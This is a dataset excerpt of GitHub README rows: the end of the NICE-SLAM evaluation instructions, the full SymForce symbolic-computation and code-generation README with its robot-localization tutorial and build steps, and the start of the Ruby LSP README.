To evaluate the reconstruction error, first download the ground truth Replica meshes where unseen regions have been culled.
```bash
bash scripts/download_cull_replica_mesh.sh
```
Then run the command below (same for NICE-SLAM and iMAP*). The 2D metric requires rendering of 1000 depth images, which will take some time (~9 minutes). Use `-2d` to enable 2D metric. Use `-3d` to enable 3D metric.
```bash
# assign any output_folder and gt mesh you like, here is just an example
OUTPUT_FOLDER=output/Replica/room0
GT_MESH=cull_replica_mesh/room0.ply
python src/tools/eval_recon.py --rec_mesh $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply --gt_mesh $GT_MESH -2d -3d
```
We also provide code to cull the mesh given camera poses. Here we take culling of ground truth mesh of Replica room0 as an example.
```bash
python src/tools/cull_mesh.py --input_mesh Datasets/Replica/room0_mesh.ply --traj Datasets/Replica/room0/traj.txt --output_mesh cull_replica_mesh/room0.ply
```
<details>
<summary>[For iMAP* evaluation (click to expand)]</summary>
As discussed in many recent papers, e.g. UNISURF/VolSDF/NeuS, manually thresholding the volume density during marching cubes might be needed. Moreover, we find that there exist scaling differences, possibly because of the reason discussed in [NeuS](https://arxiv.org/abs/2106.10689). Therefore, ICP with scale is needed. You can use the [ICP tool](https://www.cloudcompare.org/doc/wiki/index.php?title=ICP) in [CloudCompare](https://www.danielgm.net/cc/) with its default configuration and scaling enabled.
</details>
## Acknowledgement
We adapted some code from several awesome repositories, including [convolutional_occupancy_networks](https://github.com/autonomousvision/convolutional_occupancy_networks), [nerf-pytorch](https://github.com/yenchenlin/nerf-pytorch), [lietorch](https://github.com/princeton-vl/lietorch), and [DIST-Renderer](https://github.com/B1ueber2y/DIST-Renderer). Thanks for making the code publicly available. We also thank [Edgar Sucar](https://edgarsucar.github.io/) for allowing us to make the Replica Dataset available.
## Citation
If you find our code or paper useful, please cite
```bibtex
@inproceedings{Zhu2022CVPR,
author = {Zhu, Zihan and Peng, Songyou and Larsson, Viktor and Xu, Weiwei and Bao, Hujun and Cui, Zhaopeng and Oswald, Martin R. and Pollefeys, Marc},
title = {NICE-SLAM: Neural Implicit Scalable Encoding for SLAM},
booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
year = {2022}
}
```
## Contact
Contact [Zihan Zhu](mailto:zhuzihan2000@gmail.com) and [Songyou Peng](mailto:songyou.pp@gmail.com) for questions, comments and reporting bugs.
| [CVPR'22] NICE-SLAM: Neural Implicit Scalable Encoding for SLAM | slam,neural-fields,neural-implicit-representations,scalable,implicit-functions,localization,deep-learning,3d-reconstruction | 0 | 11 | 2 | 5 | 0 | 1 | 0 |
symforce-org/symforce | <!-- There's no good way to make an image that's different on light/dark mode that also links
somewhere. The closest thing is to add a #gh-light-mode-only to the target, which does this,
but is kinda confusing -->
![SymForce](docs/static/images/symforce_banner.png#gh-light-mode-only)
<!-- DARK_MODE_ONLY -->
![SymForce](docs/static/images/symforce_banner_dark.png#gh-dark-mode-only)
<!-- /DARK_MODE_ONLY -->
<p align="center">
<a href="https://github.com/symforce-org/symforce/actions/workflows/ci.yml?query=branch%3Amain"><img alt="CI status" src="https://github.com/symforce-org/symforce/actions/workflows/ci.yml/badge.svg" /></a>
<a href="https://symforce.org"><img alt="Documentation" src="https://img.shields.io/badge/api-docs-blue" /></a>
<a href="https://github.com/symforce-org/symforce"><img alt="Source Code" src="https://img.shields.io/badge/source-code-blue" /></a>
<a href="https://github.com/symforce-org/symforce/issues"><img alt="Issues" src="https://img.shields.io/badge/issue-tracker-blue" /></a>
<img alt="Python 3.8 | 3.9 | 3.10 | 3.11 | 3.12" src="https://img.shields.io/pypi/pyversions/symforce" />
<img alt="C++14" src="https://img.shields.io/badge/c++-14-blue" />
<a href="https://pypi.org/project/symforce/"><img alt="PyPI" src="https://img.shields.io/pypi/v/symforce" /></a>
<a href="https://github.com/symforce-org/symforce/tree/main/LICENSE"><img alt="Apache License" src="https://img.shields.io/pypi/l/symforce" /></a>
</p>
---
SymForce is a fast symbolic computation and code generation library for robotics applications like computer vision, state estimation, motion planning, and controls. It combines the development speed and flexibility of symbolic mathematics with the performance of autogenerated, highly optimized code in C++ or any target runtime language. SymForce contains three independently useful systems:
+ **Symbolic Toolkit** - builds on the SymPy API to provide rigorous geometric and camera types, lie group calculus, singularity handling, and tools to model complex problems
+ **Code Generator** - transforms symbolic expressions into blazing-fast, branchless code with clean APIs and minimal dependencies, with a template system to target any language
+ **Optimization Library** - a fast tangent-space optimization library based on factor graphs, with a highly optimized implementation for real-time robotics applications
SymForce automatically computes tangent space Jacobians, eliminating the need for any bug-prone handwritten derivatives. Generated functions can be directly used as factors in our nonlinear optimizer. This workflow enables faster runtime functions, faster development time, and fewer lines of handwritten code versus alternative methods.
SymForce is developed and maintained by [Skydio](https://skydio.com/). It is used in production to accelerate tasks like SLAM, bundle adjustment, calibration, and sparse nonlinear MPC for autonomous robots at scale.
<br/>
<img alt="SymForce" src="docs/static/images/symforce_diagram.png" width="700px"/>
<br/>
#### Features
+ Symbolic implementations of geometry and camera types with Lie group operations
+ Code generation of fast native runtime code from symbolic expressions, reducing duplication and minimizing bugs
+ Novel tools to compute fast and correct tangent-space jacobians for any expression, avoiding all handwritten derivatives
+ Strategies for flattening computation and leveraging sparsity that can yield 10x speedups over standard autodiff
+ A fast tangent-space optimization library in C++ and Python based on factor graphs
+ Rapid prototyping and analysis of complex problems with symbolic math, with a seamless workflow into production use
+ Embedded-friendly C++ generation of templated Eigen code with zero dynamic memory allocation
+ Highly performant, modular, tested, and extensible code
### Read the paper: <a href="https://arxiv.org/abs/2204.07889">https://arxiv.org/abs/2204.07889</a>
### And watch the video: <a href="https://youtu.be/QO_ltJRNj0o">https://youtu.be/QO_ltJRNj0o</a>
SymForce was published to [RSS 2022](https://roboticsconference.org/). Please cite it as follows:
```
@inproceedings{Martiros-RSS-22,
author = {Hayk Martiros AND Aaron Miller AND Nathan Bucki AND Bradley Solliday AND Ryan Kennedy AND Jack Zhu AND Tung Dang AND Dominic Pattison AND Harrison Zheng AND Teo Tomic AND Peter Henry AND Gareth Cross AND Josiah VanderMey AND Alvin Sun AND Samuel Wang AND Kristen Holtz},
title = {{SymForce: Symbolic Computation and Code Generation for Robotics}},
booktitle = {Proceedings of Robotics: Science and Systems},
year = {2022},
doi = {10.15607/RSS.2022.XVIII.041}
}
```
# Install
Install with pip:
```bash
pip install symforce
```
Verify the installation in Python:
```python
>>> import symforce.symbolic as sf
>>> sf.Rot3()
```
This installs pre-compiled C++ components of SymForce on Linux and Mac using pip wheels, but does not include C++ headers. If you want to compile against C++ SymForce types (like `sym::Optimizer`), you currently need to <a href="#build-from-source">build from source</a>.
# Tutorial
Let's walk through a simple example of modeling and solving an optimization problem with SymForce. In this example a robot moves through a 2D plane and the goal is to estimate its pose at multiple time steps given noisy measurements.
The robot measures:
* the distance it traveled from an odometry sensor
* relative bearing angles to known landmarks in the scene
The robot's heading angle is defined counter-clockwise from the x-axis, and its relative bearing measurements are defined from the robot's forward direction:
<img alt="Robot 2D Localization Figure" src="docs/static/images/robot_2d_localization/problem_setup.png" width="350px"/>
## Explore the math
Import the SymForce symbolic API, which contains the augmented SymPy API, as well as geometry and camera types:
```python
import symforce.symbolic as sf
```
Create a symbolic 2D pose and landmark location. Using symbolic variables lets us explore and build up the math in a pure form.
```python
pose = sf.Pose2(
t=sf.V2.symbolic("t"),
R=sf.Rot2.symbolic("R")
)
landmark = sf.V2.symbolic("L")
```
Let's transform the landmark into the local frame of the robot. We choose to represent poses as
`world_T_body`, meaning that to take a landmark in the world frame and get its position in the body
frame, we do:
```python
landmark_body = pose.inverse() * landmark
```
$$
\begin{bmatrix}
R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0 \\
-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1
\end{bmatrix}
$$
You can see that `sf.Rot2` is represented internally by a complex number (𝑅𝑟𝑒, 𝑅𝑖𝑚) and we can study how it rotates the landmark 𝐿.
For exploration purposes, let's take the jacobian of the body-frame landmark with respect to the tangent space of the `Pose2`, parameterized as (𝜃, 𝑥, 𝑦):
```python
landmark_body.jacobian(pose)
```
$$
\begin{bmatrix}
-L_0 R_{im} + L_1 R_{re} + t_0 R_{im} - t_1 R_{re}, & -R_{re}, & -R_{im} \\
-L_0 R_{re} - L_1 R_{im} + t_0 R_{re} + t_1 R_{im}, & R_{im}, & -R_{re}
\end{bmatrix}
$$
Note that even though the orientation is stored as a complex number, the tangent space is a scalar angle and SymForce understands that.
Now compute the relative bearing angle:
```python
sf.atan2(landmark_body[1], landmark_body[0])
```
$$
atan_2(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1, R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)
$$
One important note is that `atan2` is singular at (0, 0). In SymForce we handle this by placing a symbol ϵ (epsilon) that preserves the value of an expression in the limit of ϵ → 0, but allows evaluating at runtime with a very small nonzero value. Functions with singularities accept an `epsilon` argument:
```python
sf.V3.symbolic("x").norm(epsilon=sf.epsilon())
```
$$
\sqrt{x_0^2 + x_1^2 + x_2^2 + \epsilon}
$$
See the [Epsilon Tutorial](https://symforce.org/tutorials/epsilon_tutorial.html) in the SymForce Docs for more information.
## Build an optimization problem
We will model this problem as a factor graph and solve it with nonlinear least-squares.
First, we need to tell SymForce to use a nonzero epsilon to prevent singularities. This isn't necessary when playing around with symbolic expressions like we were above, but it's important now that we want to numerically evaluate some results. For more information, check out the [Epsilon Tutorial](https://symforce.org/tutorials/epsilon_tutorial.html) - for now, all you need to do is this:
```python
import symforce
symforce.set_epsilon_to_symbol()
```
This needs to be done before other parts of symforce are imported - if you're following along in a
notebook you should add this at the top and restart the kernel.
Now that epsilon is set up, we will instantiate numerical [`Values`](https://symforce.org/api/symforce.values.values.html?highlight=values#module-symforce.values.values) for the problem, including an initial guess for our unknown poses (just set them to identity).
```python
import numpy as np
from symforce.values import Values
num_poses = 3
num_landmarks = 3
initial_values = Values(
poses=[sf.Pose2.identity()] * num_poses,
landmarks=[sf.V2(-2, 2), sf.V2(1, -3), sf.V2(5, 2)],
distances=[1.7, 1.4],
angles=np.deg2rad([[145, 335, 55], [185, 310, 70], [215, 310, 70]]).tolist(),
epsilon=sf.numeric_epsilon,
)
```
Next, we can set up the factors connecting our variables. The residual function comprises two terms - one for the bearing measurements and one for the odometry measurements. Let's formalize the math we just defined for the bearing measurements into a symbolic residual function:
```python
def bearing_residual(
pose: sf.Pose2, landmark: sf.V2, angle: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
t_body = pose.inverse() * landmark
predicted_angle = sf.atan2(t_body[1], t_body[0], epsilon=epsilon)
return sf.V1(sf.wrap_angle(predicted_angle - angle))
```
This function takes in a pose and landmark variable and returns the error between the predicted bearing angle and a measured value. Note that we call `sf.wrap_angle` on the angle difference to prevent wraparound effects.
The residual for distance traveled is even simpler:
```python
def odometry_residual(
pose_a: sf.Pose2, pose_b: sf.Pose2, dist: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
return sf.V1((pose_b.t - pose_a.t).norm(epsilon=epsilon) - dist)
```
Now we can create [`Factor`](https://symforce.org/api/symforce.opt.factor.html?highlight=factor#module-symforce.opt.factor) objects from the residual functions and a set of keys. The keys are named strings for the function arguments, which will be accessed by name from a [`Values`](https://symforce.org/api/symforce.values.values.html) class we later instantiate with numerical quantities.
```python
from symforce.opt.factor import Factor
factors = []
# Bearing factors
for i in range(num_poses):
for j in range(num_landmarks):
factors.append(Factor(
residual=bearing_residual,
keys=[f"poses[{i}]", f"landmarks[{j}]", f"angles[{i}][{j}]", "epsilon"],
))
# Odometry factors
for i in range(num_poses - 1):
factors.append(Factor(
residual=odometry_residual,
keys=[f"poses[{i}]", f"poses[{i + 1}]", f"distances[{i}]", "epsilon"],
))
```
Here is a visualization of the structure of this factor graph:
<img alt="Robot 2D Localization Factor Graph" src="docs/static/images/robot_2d_localization/factor_graph.png" width="600px"/>
## Solve the problem
Our goal is to find poses of the robot that minimize the residual of this factor graph, assuming the
landmark positions in the world are known. We create an
[`Optimizer`](https://symforce.org/api/symforce.opt.optimizer.html?highlight=optimizer#module-symforce.opt.optimizer)
with these factors and tell it to only optimize the pose keys (the rest are held constant):
```python
from symforce.opt.optimizer import Optimizer
optimizer = Optimizer(
factors=factors,
optimized_keys=[f"poses[{i}]" for i in range(num_poses)],
# So that we save more information about each iteration, to visualize later:
debug_stats=True,
)
```
Now run the optimization! This returns an [`Optimizer.Result`](https://symforce.org/api/symforce.opt.optimizer.html?highlight=optimizer#symforce.opt.optimizer.Optimizer.Result) object that contains the optimized values, error statistics, and per-iteration debug stats (if enabled).
```python
result = optimizer.optimize(initial_values)
```
We can check that the optimization succeeded, and look at the final error:
```python
assert result.status == Optimizer.Status.SUCCESS
print(result.error())
```
Let's visualize what the optimizer did. The orange circles represent the fixed landmarks, the blue
circles represent the robot, and the dotted lines represent the bearing measurements.
```python
from symforce.examples.robot_2d_localization.plotting import plot_solution
plot_solution(optimizer, result)
```
<img alt="Robot 2D Localization Solution" src="docs/static/images/robot_2d_localization/iterations.gif" width="600px"/>
All of the code for this example can also be found in `symforce/examples/robot_2d_localization`.
## Symbolic vs Numerical Types
SymForce provides `sym` packages with runtime code for geometry and camera types that are generated from its symbolic `geo` and `cam` packages. As such, there are multiple versions of a class like `Pose3` and it can be a common source of confusion.
The canonical symbolic class [`sf.Pose3`](https://symforce.org/api/symforce.symbolic.html#symforce.symbolic.Pose3) lives in the `symforce` package:
```python
sf.Pose3.identity()
```
The autogenerated Python runtime class [`sym.Pose3`](https://symforce.org/api-gen-py/sym.pose3.html?highlight=pose3#module-sym.pose3) lives in the `sym` package:
```python
import sym
sym.Pose3.identity()
```
The autogenerated C++ runtime class [`sym::Pose3`](https://symforce.org/api-gen-cpp/class/classsym_1_1Pose3.html) lives in the `sym::` namespace:
```C++
sym::Pose3<double>::Identity()
```
The matrix type for symbolic code is [`sf.Matrix`](https://symforce.org/api/symforce.symbolic.html#symforce.symbolic.Matrix), for generated Python is [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html), and for C++ is [`Eigen::Matrix`](https://eigen.tuxfamily.org/dox/group__TutorialMatrixClass.html).
The symbolic classes can also handle numerical values, but will be dramatically slower than the generated classes. The symbolic classes must be used when defining functions for codegen and optimization. Generated functions always accept the runtime types.
The `Codegen` or `Factor` objects require symbolic types and functions to do math and generate code. However, once code is generated, numerical types should be used when invoking generated functions and in the initial values when calling the `Optimizer`.
As a convenience, the Python `Optimizer` class can accept symbolic types in its `Values` and convert to numerical types before invoking generated functions. This is done in the tutorial example for simplicity.
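As a small illustration (a sketch rather than an excerpt from the tutorial), the symbolic and generated types expose parallel APIs, and the practical question is simply which one to reach for at each stage:

```python
import symforce.symbolic as sf  # symbolic types: for modeling residuals and codegen
import sym                      # generated runtime types: fast, numpy-backed

# Use the symbolic type while defining and introspecting the math...
symbolic_pose = sf.Pose3.identity()

# ...and the generated runtime type when calling generated functions or the Optimizer.
runtime_pose = sym.Pose3.identity()

print(type(symbolic_pose), type(runtime_pose))
```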
## Generate runtime C++ code
Let's look under the hood to understand how that optimization worked. For each factor, SymForce introspects the form of the symbolic function, passes through symbolic inputs to build an output expression, automatically computes tangent-space jacobians of those output expressions w.r.t. the optimized variables, and generates fast runtime code for them.
The [`Codegen`](https://symforce.org/api/symforce.codegen.codegen.html?highlight=codegen#module-symforce.codegen.codegen) class is the central tool for generating runtime code from symbolic expressions. In this case, we pass it the bearing residual function and configure it to generate C++ code:
```python
from symforce.codegen import Codegen, CppConfig
codegen = Codegen.function(bearing_residual, config=CppConfig())
```
We can then create another `Codegen` object that computes a Gauss-Newton linearization from this Codegen object. It does this by introspecting and symbolically differentiating the given arguments:
```python
codegen_linearization = codegen.with_linearization(
which_args=["pose"]
)
```
Generate a C++ function that computes the linearization wrt the pose argument:
```python
metadata = codegen_linearization.generate_function()
print(open(metadata.generated_files[0]).read())
```
This C++ code depends only on Eigen and computes the results in a single flat function that shares all common sub-expressions:
```c++
#pragma once
#include <Eigen/Core>
#include <sym/pose2.h>
namespace sym {
/**
* This function was autogenerated from a symbolic function. Do not modify by hand.
*
* Symbolic function: bearing_residual
*
* Args:
* pose: Pose2
* landmark: Matrix21
* angle: Scalar
* epsilon: Scalar
*
* Outputs:
* res: Matrix11
* jacobian: (1x3) jacobian of res wrt arg pose (3)
* hessian: (3x3) Gauss-Newton hessian for arg pose (3)
* rhs: (3x1) Gauss-Newton rhs for arg pose (3)
*/
template <typename Scalar>
void BearingFactor(const sym::Pose2<Scalar>& pose, const Eigen::Matrix<Scalar, 2, 1>& landmark,
const Scalar angle, const Scalar epsilon,
Eigen::Matrix<Scalar, 1, 1>* const res = nullptr,
Eigen::Matrix<Scalar, 1, 3>* const jacobian = nullptr,
Eigen::Matrix<Scalar, 3, 3>* const hessian = nullptr,
Eigen::Matrix<Scalar, 3, 1>* const rhs = nullptr) {
// Total ops: 66
// Input arrays
const Eigen::Matrix<Scalar, 4, 1>& _pose = pose.Data();
// Intermediate terms (24)
const Scalar _tmp0 = _pose[1] * _pose[2];
const Scalar _tmp1 = _pose[0] * _pose[3];
const Scalar _tmp2 = _pose[0] * landmark(1, 0) - _pose[1] * landmark(0, 0);
const Scalar _tmp3 = _tmp0 - _tmp1 + _tmp2;
const Scalar _tmp4 = _pose[0] * _pose[2] + _pose[1] * _pose[3];
const Scalar _tmp5 = _pose[1] * landmark(1, 0);
const Scalar _tmp6 = _pose[0] * landmark(0, 0);
const Scalar _tmp7 = -_tmp4 + _tmp5 + _tmp6;
const Scalar _tmp8 = _tmp7 + epsilon * ((((_tmp7) > 0) - ((_tmp7) < 0)) + Scalar(0.5));
const Scalar _tmp9 = -angle + std::atan2(_tmp3, _tmp8);
const Scalar _tmp10 =
_tmp9 - 2 * Scalar(M_PI) *
std::floor((Scalar(1) / Scalar(2)) * (_tmp9 + Scalar(M_PI)) / Scalar(M_PI));
const Scalar _tmp11 = Scalar(1.0) / (_tmp8);
const Scalar _tmp12 = std::pow(_tmp8, Scalar(2));
const Scalar _tmp13 = _tmp3 / _tmp12;
const Scalar _tmp14 = _tmp11 * (_tmp4 - _tmp5 - _tmp6) - _tmp13 * (_tmp0 - _tmp1 + _tmp2);
const Scalar _tmp15 = _tmp12 + std::pow(_tmp3, Scalar(2));
const Scalar _tmp16 = _tmp12 / _tmp15;
const Scalar _tmp17 = _tmp14 * _tmp16;
const Scalar _tmp18 = _pose[0] * _tmp13 + _pose[1] * _tmp11;
const Scalar _tmp19 = _tmp16 * _tmp18;
const Scalar _tmp20 = -_pose[0] * _tmp11 + _pose[1] * _tmp13;
const Scalar _tmp21 = _tmp16 * _tmp20;
const Scalar _tmp22 = std::pow(_tmp8, Scalar(4)) / std::pow(_tmp15, Scalar(2));
const Scalar _tmp23 = _tmp18 * _tmp22;
// Output terms (4)
if (res != nullptr) {
Eigen::Matrix<Scalar, 1, 1>& _res = (*res);
_res(0, 0) = _tmp10;
}
if (jacobian != nullptr) {
Eigen::Matrix<Scalar, 1, 3>& _jacobian = (*jacobian);
_jacobian(0, 0) = _tmp17;
_jacobian(0, 1) = _tmp19;
_jacobian(0, 2) = _tmp21;
}
if (hessian != nullptr) {
Eigen::Matrix<Scalar, 3, 3>& _hessian = (*hessian);
_hessian(0, 0) = std::pow(_tmp14, Scalar(2)) * _tmp22;
_hessian(0, 1) = 0;
_hessian(0, 2) = 0;
_hessian(1, 0) = _tmp14 * _tmp23;
_hessian(1, 1) = std::pow(_tmp18, Scalar(2)) * _tmp22;
_hessian(1, 2) = 0;
_hessian(2, 0) = _tmp14 * _tmp20 * _tmp22;
_hessian(2, 1) = _tmp20 * _tmp23;
_hessian(2, 2) = std::pow(_tmp20, Scalar(2)) * _tmp22;
}
if (rhs != nullptr) {
Eigen::Matrix<Scalar, 3, 1>& _rhs = (*rhs);
_rhs(0, 0) = _tmp10 * _tmp17;
_rhs(1, 0) = _tmp10 * _tmp19;
_rhs(2, 0) = _tmp10 * _tmp21;
}
}
} // namespace sym
```
SymForce can also generate runtime Python code that depends only on `numpy`.
The code generation system is written with pluggable [jinja](https://palletsprojects.com/p/jinja/) templates to minimize the work to add new backend languages. Some of our top candidates to add are TypeScript, CUDA, and PyTorch.
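For example, the earlier bearing residual could be emitted as numpy-based Python instead of C++ by swapping the codegen config; this is a sketch that assumes a `PythonConfig` backend is available alongside `CppConfig`:

```python
from symforce.codegen import Codegen, PythonConfig

# Same residual as before, but targeting the Python/numpy backend.
codegen_py = Codegen.function(bearing_residual, config=PythonConfig())
metadata_py = codegen_py.generate_function()
print(open(metadata_py.generated_files[0]).read())
```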
## Optimize from C++
Now that we can generate C++ functions for each residual function, we can also run the optimization purely from C++ to get Python entirely out of the loop for production use.
```c++
const int num_poses = 3;
const int num_landmarks = 3;
std::vector<sym::Factor<double>> factors;
// Bearing factors
for (int i = 0; i < num_poses; ++i) {
for (int j = 0; j < num_landmarks; ++j) {
factors.push_back(sym::Factor<double>::Hessian(
sym::BearingFactor<double>,
{{'P', i}, {'L', j}, {'a', i, j}, {'e'}}, // keys
{{'P', i}} // keys to optimize
));
}
}
// Odometry factors
for (int i = 0; i < num_poses - 1; ++i) {
factors.push_back(sym::Factor<double>::Hessian(
sym::OdometryFactor<double>,
{{'P', i}, {'P', i + 1}, {'d', i}, {'e'}}, // keys
{{'P', i}, {'P', i + 1}} // keys to optimize
));
}
const auto params = sym::DefaultOptimizerParams();
sym::Optimizer<double> optimizer(
params,
factors,
sym::kDefaultEpsilon<double>
);
sym::Values<double> values;
for (int i = 0; i < num_poses; ++i) {
values.Set({'P', i}, sym::Pose2d::Identity());
}
// Set additional values
values.Set({'L', 0}, Eigen::Vector2d(-2, 2));
values.Set({'L', 1}, Eigen::Vector2d(1, -3));
values.Set({'L', 2}, Eigen::Vector2d(5, 2));
values.Set({'d', 0}, 1.7);
values.Set({'d', 1}, 1.4);
const std::array<std::array<double, 3>, 3> angles = {
{{55, 245, -35}, {95, 220, -20}, {125, 220, -20}}
};
for (int i = 0; i < angles.size(); ++i) {
for (int j = 0; j < angles[0].size(); ++j) {
values.Set({'a', i, j}, angles[i][j] * M_PI / 180);
}
}
values.Set('e', sym::kDefaultEpsilond);
// Optimize!
const auto stats = optimizer.Optimize(values);
std::cout << "Exit status: " << stats.status << std::endl;
std::cout << "Optimized values:" << values << std::endl;
```
This tutorial shows the central workflow in SymForce for creating symbolic expressions, generating code, and optimizing. This approach works well for a wide range of complex problems in robotics, computer vision, and applied science.
However, each piece may also be used independently. The optimization machinery can work with handwritten functions, and the symbolic math and code generation are useful outside of any optimization context.
<!-- $
<span style="color:blue">TODO: I wanted to show `sf.V1(sm.atan2(landmark_body[1], landmark_body[0])).jacobian(pose.R)`, but you have to call `sm.simplify` to get the expression to -1, otherwise it's more complicated. All this is also showing up extraneously in the generated code. Discuss what to show.</span>
\frac{
(-\frac{
(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1)^2
}{
(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
} + \frac{
}{
})(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
}{
(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1)^2 +
(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
}
$ -->
To learn more, visit the SymForce tutorials [here](https://symforce.org/#guides).
# Build from Source
For best results, you should build from the [latest tagged release](https://github.com/symforce-org/symforce/releases/latest). You can also build from `main`, or from another branch, but everything is less guaranteed to work.
SymForce requires Python 3.8 or later. The build is currently tested on Linux and macOS, SymForce on Windows is untested (see [#145](https://github.com/symforce-org/symforce/issues/145)). We strongly suggest creating a virtual python environment.
Install the `gmp` package with one of:
```bash
apt install libgmp-dev # Ubuntu
brew install gmp # Mac
conda install -c conda-forge gmp # Conda
```
SymForce contains both C++ and Python code. The C++ code is built using CMake. You can build the package either by calling pip, or by calling CMake directly. If building with `pip`, this will call CMake under the hood, and run the same CMake build for the C++ components.
If you encounter build issues, please file an [issue](https://github.com/symforce-org/symforce/issues).
## Build with pip
If you just want to build and install SymForce without repeatedly modifying the source, the recommended way to do this is with pip. From the symforce directory:
```bash
pip install .
```
If you're modifying the SymForce Python sources, you can do an [editable install](https://pip.pypa.io/en/stable/topics/local-project-installs/#editable-installs) instead. This will let you modify the Python components of SymForce without reinstalling. If you're going to repeatedly modify the C++ sources, you should instead build with CMake directly as described <a href="#build-with-cmake">below</a>. From the symforce directory:
```bash
pip install -e .
```
You should then [verify your installation](#verify-your-installation).
___Note:___ `pip install .` will not install pinned versions of SymForce's dependencies; it will install any compatible versions. It also won't install all packages required to run all of the SymForce tests and build all of the targets (e.g. building the docs or running the linters). If you want all packages required for that, you should `pip install .[dev]` instead (or one of the other groups of extra requirements in our `setup.py`). If you additionally want pinned versions of our dependencies, which are the exact versions guaranteed by CI to pass all of our tests, you can install them with `pip install -r dev_requirements.txt`.
_Note: Editable installs as root with the system python on Ubuntu (and other Debian derivatives) are broken on `setuptools<64.0.0`. This is a [bug in Debian](https://ffy00.github.io/blog/02-python-debian-and-the-install-locations/), not something in SymForce that we can fix. If this is your situation, either use a virtual environment, upgrade setuptools to a version `>=64.0.0`, or use a different installation method._
## Build with CMake
If you'll be modifying the C++ parts of SymForce, you should build with CMake directly instead - this method will not install
SymForce into your Python environment, so you'll need to add it to your PYTHONPATH separately.
Install python requirements:
```bash
pip install -r dev_requirements.txt
```
Build SymForce (requires C++14 or later):
```bash
mkdir build
cd build
cmake ..
make -j $(nproc)
```
You'll then need to add SymForce (along with `gen/python` and `third_party/skymarshal` within symforce and `lcmtypes/python2.7` within the build directory) to your PYTHONPATH in order to use them, for example:
```bash
export PYTHONPATH="$PYTHONPATH:/path/to/symforce:/path/to/symforce/build/lcmtypes/python2.7"
```
If you want to install SymForce to use its C++ libraries in another CMake project, you can do that with:
```bash
make install
```
SymForce does not currently integrate with CMake's `find_package` (see [#209](https://github.com/symforce-org/symforce/issues/209)), so if you do this you currently need to add its libraries as link dependencies in your CMake project manually.
## Verify your installation
```python
>>> import symforce
>>> symforce.get_symbolic_api()
'symengine'
>>> from symforce import cc_sym
```
If you see `'sympy'` here instead of `'symengine'`, or can't import `cc_sym`, your installation is probably broken and you should submit an [issue](https://github.com/symforce-org/symforce/issues).
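As an optional extra smoke test, the snippet below exercises the symbolic backend end to end. It is a small sketch that assumes `symforce.symbolic` exposes the usual `Symbol`, `sin`, `cos`, and `simplify` helpers:
```python
import symforce.symbolic as sf

x = sf.Symbol("x")
expr = sf.sin(x) ** 2 + sf.cos(x) ** 2

# With a working symengine backend this prints the simplified result, 1
print(sf.simplify(expr))
```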
# License
SymForce is released under the [Apache 2.0](https://spdx.org/licenses/Apache-2.0.html) license.
See the [LICENSE](https://github.com/symforce-org/symforce/blob/main/LICENSE) file for more information.
# Sponsors
SymForce is developed and maintained by [Skydio](https://skydio.com/). It is released as a free and open-source library for the robotics community.
<a href="http://skydio.com#gh-light-mode-only">
<img alt="Skydio Logo" src="docs/static/images/skydio-logo-2.png" width="300px" />
</a>
<!-- DARK_MODE_ONLY -->
<a href="http://skydio.com#gh-dark-mode-only">
<img alt="Skydio Logo" src="docs/static/images/skydio-logo-2-white.png" width="300px" />
</a>
<!-- /DARK_MODE_ONLY -->
# Contributing
While SymForce already powers tens of thousands of robots at Skydio, the public library is new and we are releasing it in beta stage. This is just the beginning, and we are excited for engagement from the community. Thank you for helping us develop SymForce! The best way to get started is to file [issues](https://github.com/symforce-org/symforce/issues) for bugs or desired features.
There are many features we're excited to add to SymForce and would love to see contributed by the community. Most are outlined in the issues, but some major desired contributions are:
- Add more backend languages, such as TypeScript and GLSL/HLSL, and improvements to the experimental CUDA and PyTorch backends
- Support for WebAssembly compilation
- More Lie group types, in particular Sim(3)
- Support for constraints in our optimizer
- Integration with [ISPC](https://ispc.github.io/)
- Windows and conda packages
| Fast symbolic computation, code generation, and nonlinear optimization for robotics | robotics,python,cpp,code-generation,optimization,symbolic-computation,slam,computer-vision,motion-planning,structure-from-motion | 7 | 67 | 122 | 992 | 128 | 18 | 4 |
Shopify/ruby-lsp | <p align="center">
<img alt="Ruby LSP logo" width="200" src="vscode/icon.png" />
</p>
[![Build Status](https://github.com/Shopify/ruby-lsp/workflows/CI/badge.svg)](https://github.com/Shopify/ruby-lsp/actions/workflows/ci.yml)
[![Ruby LSP extension](https://img.shields.io/badge/VS%20Code-Ruby%20LSP-success?logo=visual-studio-code)](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp)
[![Ruby DX Slack](https://img.shields.io/badge/Slack-Ruby%20DX-success?logo=slack)](https://join.slack.com/t/ruby-dx/shared_invite/zt-2c8zjlir6-uUDJl8oIwcen_FS_aA~b6Q)
# Ruby LSP
The Ruby LSP is an implementation of the [language server protocol](https://microsoft.github.io/language-server-protocol/)
for Ruby, used to improve rich features in editors. It is a part of a wider goal to provide a state-of-the-art
experience to Ruby developers using modern standards for cross-editor features, documentation and debugging.
Want to discuss Ruby developer experience? Consider joining the public
[Ruby DX Slack workspace](https://join.slack.com/t/ruby-dx/shared_invite/zt-2c8zjlir6-uUDJl8oIwcen_FS_aA~b6Q).
## Features
![Ruby LSP demo](vscode/extras/ruby_lsp_demo.gif)
The Ruby LSP features include
- Semantic highlighting
- Symbol search and code outline
- RuboCop errors and warnings (diagnostics)
- Format on save (with RuboCop or Syntax Tree)
- Format on type
- Debugging support
- Running and debugging tests through VS Code's UI
- Go to definition for classes, modules, constants and required files
- Showing documentation on hover for classes, modules and constants
- Completion for classes, modules, constants and require paths
